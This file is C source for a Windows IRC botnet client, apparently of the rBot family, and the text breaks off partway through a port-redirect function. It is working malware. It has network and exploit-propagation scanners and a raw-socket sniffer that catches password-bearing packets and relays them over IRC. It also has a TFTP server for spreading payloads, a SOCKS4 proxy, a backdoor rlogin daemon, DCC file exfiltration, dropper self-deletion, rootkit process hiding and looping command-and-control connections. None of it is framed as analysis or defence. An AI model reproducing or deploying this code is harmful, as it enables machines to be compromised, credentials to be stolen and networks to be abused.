// checks ip for open port
DWORD WINAPI ScanConnectThread(LPVOID param)
{
static char sendbuf[IRCLINE];
SCAN scan = *((SCAN *)param);
SCAN *scans = (SCAN *)param;
scans->cgotinfo = TRUE;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)scan.port);
ssin.sin_addr = scan.addy;
SOCKET sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock != INVALID_SOCKET) {
DWORD err = fconnect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN));
threads[scan.threadnum].sock = sock;
if (err != SOCKET_ERROR) {
sprintf(sendbuf,"nz m (portscan.p l g) »» IP: %s Port: %d is open.", finet_ntoa(scan.addy), scan.port);
irc_privmsg(scan.sock, scan.chan, sendbuf, scan.notice);
addlog(sendbuf);
}
}
fclosesocket(sock);
return 0;
}
// scan a range of IPs for an open port
DWORD WINAPI ScanThread(LPVOID param)
{
DWORD id, host;
HANDLE th;
char str[128];
SCAN scan = *((SCAN *)param);
SCAN *scans = (SCAN *)param;
scans->gotinfo = TRUE;
while(1) {
sprintf(str, "nz m (portscan.p l g) »» Scanning IP: %s, Port: %d.", finet_ntoa(scan.addy), scan.port);
strncpy(threads[scan.threadnum].name, str, sizeof(threads[scan.threadnum].name)-1);
if (th = CreateThread(NULL, 0, &ScanConnectThread, (LPVOID)&scan, 0, &id)) {
while(scan.cgotinfo == FALSE)
Sleep(50);
}
CloseHandle(th);
scans->cgotinfo = FALSE;
Sleep(scans->delay);
memcpy(&host, &scan.addy, 4);
host = fntohl(host);
host += 1;
host = fhtonl(host);
memcpy(&scan.addy, &host, 4);
}
clearthread(scan.threadnum);
return 0;
}
DWORD WINAPI IdentThread(LPVOID param)
{
char user[12], buffer[IRCLINE];
int threadnum = (int)param;
BOOL success = FALSE;
SOCKET ssock,csock;
SOCKADDR_IN ssin, csin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)113);
ssin.sin_addr.s_addr=INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
threads[threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if (flisten(ssock, 5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
break;
sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
Split(buffer,0);
memset(user, 0, sizeof(user));
_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
success = TRUE;
}
}
}
}
}
if (!success) {
sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
addlog(buffer);
}
fclosesocket(ssock);
fclosesocket(csock);
clearthread(threadnum);
ExitThread(0);
}
void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
{
char sendbuf[IRCLINE];
if (findthreadid(SCAN_THREAD) > 0) {
IN_ADDR in;
in.s_addr = advinfo[threadnum].ip;
sprintf(sendbuf, "%s Current IP: %s",mn_title,finet_ntoa(in));
} else
sprintf(sendbuf ,"%s Scan not active.",mn_title);
irc_privmsg(sock, chan, sendbuf, notice);
addlog(sendbuf);
return;
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR sia, dia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
sia.S_un.S_addr = ip->sourceIP;
dia.S_un.S_addr = ip->destIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
if (strstr(Packet, pswords[i].text)) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s",
ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
printf("%s\n",sendbuf);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
DWORD WINAPI Bthd(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle)))
Sleep(5000);
else
break;
}
if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT)
ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
srand(GetTickCount());
dwstarted=GetTickCount();
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
int i=0;
DWORD id=0;
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(sinfo[curserver].host,sinfo[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(srvsz-1))
curserver=0;
else
curserver++;
}
// cleanup;
//killthreadall();
fWSACleanup();
ReleaseMutex(xetum);
ExitThread(0);
return TRUE;
}
DWORD WINAPI tftpserver(LPVOID param)
{
FILE *fp;
char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
int err=1;
TFTP tftp = *((TFTP *)param);
TFTP *tftps = (TFTP *)param;
tftps->gotinfo = TRUE;
tftp.threads++;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
threads[tftp.threadnum].sock=ssock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)tftp.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
Sleep(5000);
tftp.threads--;
return tftpserver(param);
}
if ((fp=fopen(tftp.filename, "rb")) == NULL) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
while(err>0 && tftps->gotinfo && fp) {
TIMEVAL timeout;
timeout.tv_sec=5;
timeout.tv_usec=5000;
fd_set fd;
FD_ZERO(&fd);
FD_SET(ssock,&fd);
memset(buffer,0,sizeof(buffer));
if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
SOCKADDR_IN csin;
int csin_len=sizeof(csin);
char f_buffer[BLOCKSIZE+4]="";
err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
sprintf(IP,finet_ntoa(csin.sin_addr));
// parse buffer
if(buffer[0]==0 && buffer[1]==1) { //RRQ
char *tmprequest=buffer,*tmptype=buffer;
tmprequest+=2; //skip the opcode
tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
// for loop to add a \0 to the end of the requestname
sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
addlog(buffer);
} else { // good rrq packet send first data packet
fseek(fp, 0, SEEK_SET);
f_buffer[0]=0; f_buffer[1]=3; // DATA
f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else if(buffer[0]==0 && buffer[1]==4) { // ACK
// send next packet
unsigned int blocks;
BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #
f_buffer[0]=0; f_buffer[1]=3; // DATA
if (b2==255) { // DATA BLOCK #
f_buffer[2]=++b1;
f_buffer[3]=b2=0;
} else {
f_buffer[2]=b1;
f_buffer[3]=++b2;
}
blocks=(b1 * 256) + b2 - 1;
// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
if (err==0) {
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else { // we dont support any other commands
fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
}
} else
continue;
}
// check for ack, then msg irc on transfer complete
fclosesocket(ssock);
fclose(fp);
tftp.threads--;
if(tftps->gotinfo == FALSE) {
clearthread(tftp.threadnum);
ExitThread(0);
}
Sleep(1000);
return tftpserver(param);
}
DWORD WINAPI Socks4Thread(LPVOID param)
{
char sendbuf[IRCLINE];
SOCKADDR_IN ssin, csin;
SOCKET ssock, csock;
DWORD lpThreadId;
int csin_len = sizeof(csin);
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->gotinfo = TRUE;
memset(&ssin,0,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)socks4.port);
ssin.sin_addr.s_addr = INADDR_ANY;
ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
threads[socks4.threadnum].sock=ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, 10) == 0) {
sprintf(sendbuf, "[SOCKS4]: Server started on: %s:%d.", GetIP(socks4.sock), socks4.port);
if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
addlog(sendbuf);
while (1) {
csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len);
socks4.cgotinfo = FALSE;
sprintf(sendbuf,"[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, socks4.threadnum);
socks4.cthreadnum = addthread(sendbuf,SOCKS4_THREAD,csock);
threads[socks4.cthreadnum].parent = socks4.threadnum;
if (threads[socks4.cthreadnum].tHandle = CreateThread(NULL, 0, &Socks4ClientThread, (LPVOID)&socks4, 0, &lpThreadId)) {
while (socks4.cgotinfo == FALSE)
Sleep(5);
} else
sprintf(sendbuf, "[SOCKS4]: Failed to start client thread, error: <%d>.", GetLastError());
addlog(sendbuf);
}
}
}
fclosesocket(ssock);
sprintf(sendbuf, "[SOCKS4]: Failed to start server on Port %d.", socks4.port);
if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
addlog(sendbuf);
clearthread(socks4.threadnum);
ExitThread(0);
}
DWORD WINAPI RlogindClientThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
int threadnum=rlogind.cthreadnum;
char LocalUser[16], RemoteUser[16], TerminalType[64], HostName[100], Buffer[16];
LPHOSTENT HostEnt;
SOCKADDR_IN csin;
TIMEVAL timeout;
timeout.tv_sec = 10;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
frecv(threads[threadnum].sock, (char *)&Buffer, 1, 0);
GetStr(threads[threadnum].sock, RemoteUser, sizeof(RemoteUser));
GetStr(threads[threadnum].sock, LocalUser, sizeof(LocalUser));
GetStr(threads[threadnum].sock, TerminalType, sizeof(TerminalType));
int csin_len = sizeof(csin);
if (fgetpeername(threads[threadnum].sock, (LPSOCKADDR)&csin, &csin_len) != 0) {
addlogv("[RLOGIND]: Error: getpeername(): <%d>.", fWSAGetLastError());
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if ((HostEnt = fgethostbyaddr((char *)&csin.sin_addr, sizeof(csin.sin_addr), PF_INET)) == NULL)
sprintf(HostName, finet_ntoa(csin.sin_addr));
else
strcpy(HostName, HostEnt->h_name);
frecv(threads[threadnum].sock, (char *)Buffer, sizeof(Buffer), 0);
fsend(threads[threadnum].sock, "", 1, 0);
if (!InsecureFlag && !CheckLogin(RemoteUser,HostName,rlogind.username,csin.sin_addr.s_addr)) {
fsend(threads[threadnum].sock, "PERMISSION DENIED.", sizeof("PERMISSION DENIED."), 0);
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
addlogv("[RLOGIND]: User logged in: <%s@%s>.", RemoteUser, HostName);
if (!SessionRun(threadnum)) {
addlogv("[RLOGIND]: Error: SessionRun(): <%d>.", GetLastError());
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(1);
}
addlogv("[RLOGIND]: User logged out: <%s@%s>.", RemoteUser, HostName);
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI BotThread(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
Sleep(5000);
else
break;
}
// if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
// ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
#ifndef _DEBUG
#ifndef NO_MELT
char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
if (melt)
{
SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
int tries=0;
while (FileExists(melt) && tries<3)
{
DeleteFile(melt);
tries++;
Sleep(2000);
}
RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
}
#endif // NO_MELT
#endif // _DEBUG
srand(GetTickCount());
dwstarted=GetTickCount();
#ifndef NO_VERSION_REPLY
curversion=rand()%(versionsize);
#ifdef _DEBUG
printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
#ifndef _DEBUG
#ifndef NO_FCONNECT
char readbuf[1024];
HINTERNET httpopen, openurl;
DWORD read;
httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
if (!openurl)
{
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
}
fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG
#ifndef NO_INSTALLED_TIME
if (!noadvapi32)
GetInstalledTime();
else
sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
int i=0;
DWORD id=0;
#ifndef NO_RECORD_UPTIME
i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
NTHREAD secure;
secure.bdata2=TRUE;//loop
i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
#ifndef NO_RDRIV
#ifndef _DEBUG
rkenabled=InitRK();//initialize fu
if (rkenabled)
HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV
#ifndef _DEBUG // maybe this will give the shutdown handler time to work
RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
//get internal ip
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(servers[curserver].host,servers[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(serversize-1))
curserver=0;
else
curserver++;
}
// cleanup;
killthreadall();
fWSACleanup();
ReleaseMutex(mutex);
ExitThread(0);
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
//char szSelfExe[MAX_PATH];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
// FIX ME: Make this a standalone function
if (!FileExists(szLocalPayloadFile)) {
GetModuleFileName(0,szSelfExe,MAX_PATH);
CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
// FIX ME: Make this copy to the same directory (could affect other stuff)
}
*/
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
// failed to initialize CriticalSection
sprintf(buffer,"[SCAN]: Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI DCCSendThread(LPVOID param)
{
DCC dcc = *((DCC *)param);
DCC *dccs = (DCC *)param;
dccs->gotinfo = TRUE;
char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH];
int Fsend, bytes_sent;
unsigned int move;
unsigned __int64 totalbytes = 0;
DWORD mode = 0;
SOCKET ssock;
while (1) {
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
sprintf(sendbuf,"[DCC]: Failed to create socket.");
break;
}
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);//random port
ssin.sin_addr.s_addr = INADDR_ANY;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) {
sprintf(sendbuf,"[DCC]: Failed to bind to socket.");
break;
}
int ssin_len = sizeof(ssin);
fgetsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len);
unsigned short portnum = fntohs(ssin.sin_port);
for (unsigned int i=0;i <= strlen(dcc.filename); i++)
tmpfile[i] = ((dcc.filename[i] == 32)?(95):(dcc.filename[i]));
if (flisten(ssock, 1) != 0) {
sprintf(sendbuf,"[DCC]: Failed to open socket.");
break;
}
HANDLE testfile = CreateFile(dcc.filename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if (testfile == INVALID_HANDLE_VALUE) {
sprintf(sendbuf,"[DCC]: File doesn't exist.");
break;
}
int length = GetFileSize(testfile,NULL);
sprintf(sendbuf,"DCC SEND %s %i %i %i",dcc.filename,fhtonl(finet_addr(GetIP(dcc.sock))),portnum,length);
irc_privmsg(dcc.sock,dcc.sendto,sendbuf,FALSE);
TIMEVAL timeout;
timeout.tv_sec = 60;//timeout after 60 sec.
timeout.tv_usec = 0;
fd_set fd_struct;
FD_ZERO(&fd_struct);
FD_SET(ssock, &fd_struct);
if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Send timeout.",dcc.notice);
break;
}
int csin_len = sizeof(csin);
if ((dcc.csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) {
sprintf(sendbuf,"[DCC]: Unable to open socket.");
break;
}
fclosesocket(ssock);
while (length) {
Fsend = 1024;
if (Fsend>length)
Fsend=length;
move = 0-length;
memset(buffer,0,sizeof(buffer));
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = fsend(dcc.csock, buffer, Fsend, 0);
totalbytes += bytes_sent;
if (frecv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) {
irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Socket error.",dcc.notice);
addlog("[DCC]: Socket error.");
fclosesocket(dcc.csock);
clearthread(dcc.threadnum);
ExitThread(1);
}
length = length - bytes_sent;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
sprintf(sendbuf,"[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).",finet_ntoa(csin.sin_addr),dcc.filename,commaI64(totalbytes));
break;
}
if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
addlog(sendbuf);
if (ssock > 0)
fclosesocket(ssock);
fclosesocket(dcc.csock);
clearthread(dcc.threadnum);
ExitThread(0);
}
// part of the redirect function, handles sending/recieving for the remote connection.
DWORD WINAPI RedirectLoopThread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->gotinfo = TRUE;
int threadnum=redirect.cthreadnum;
char sendbuf[IRCLINE], buff[4096];
int err;
DWORD id;
SOCKET ssock;
do {
if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(redirect.port);
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(redirect.dest);
LPHOSTENT hostent;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(redirect.dest);
else
hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET);
if (hostent == NULL) break;
ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);
if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break;
redirect.cgotinfo = FALSE;
sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum);
redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock);
threads[redirect.cthreadnum].parent = redirect.threadnum;
threads[redirect.cthreadnum].csock = threads[threadnum].sock;
if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) {
while (redirect.cgotinfo == FALSE)
Sleep(50);
} else {
addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError());
break;
}
while (1) {
memset(buff, 0, sizeof(buff));
if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break;
if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break;
}
break;
} while (1);
fclosesocket(threads[threadnum].sock);
fclosesocket(ssock);
clearthread(threadnum);
ExitThread(0);
}
// port redirect function
DWORD WINAPI RedirectThread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->gotinfo = TRUE;
char sendbuf[IRCLINE];
DWORD id;
SOCKADDR_IN rsin, csin;
memset(&rsin, 0, sizeof(rsin));
rsin.sin_family = AF_INET;
rsin.sin_port = fhtons(redirect.lport);
rsin.sin_addr.s_addr = INADDR_ANY;
int csin_len = sizeof(csin);
SOCKET rsock, csock;
if ((rsock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[redirect.threadnum].sock = rsock;
fWSAAsyncSelect(rsock, 0, WM_USER + 1, FD_READ);
if (fbind(rsock, (LPSOCKADDR)&rsin, sizeof(rsin)) == 0) {
if (flisten(rsock, 10) == 0) {
while(1) {
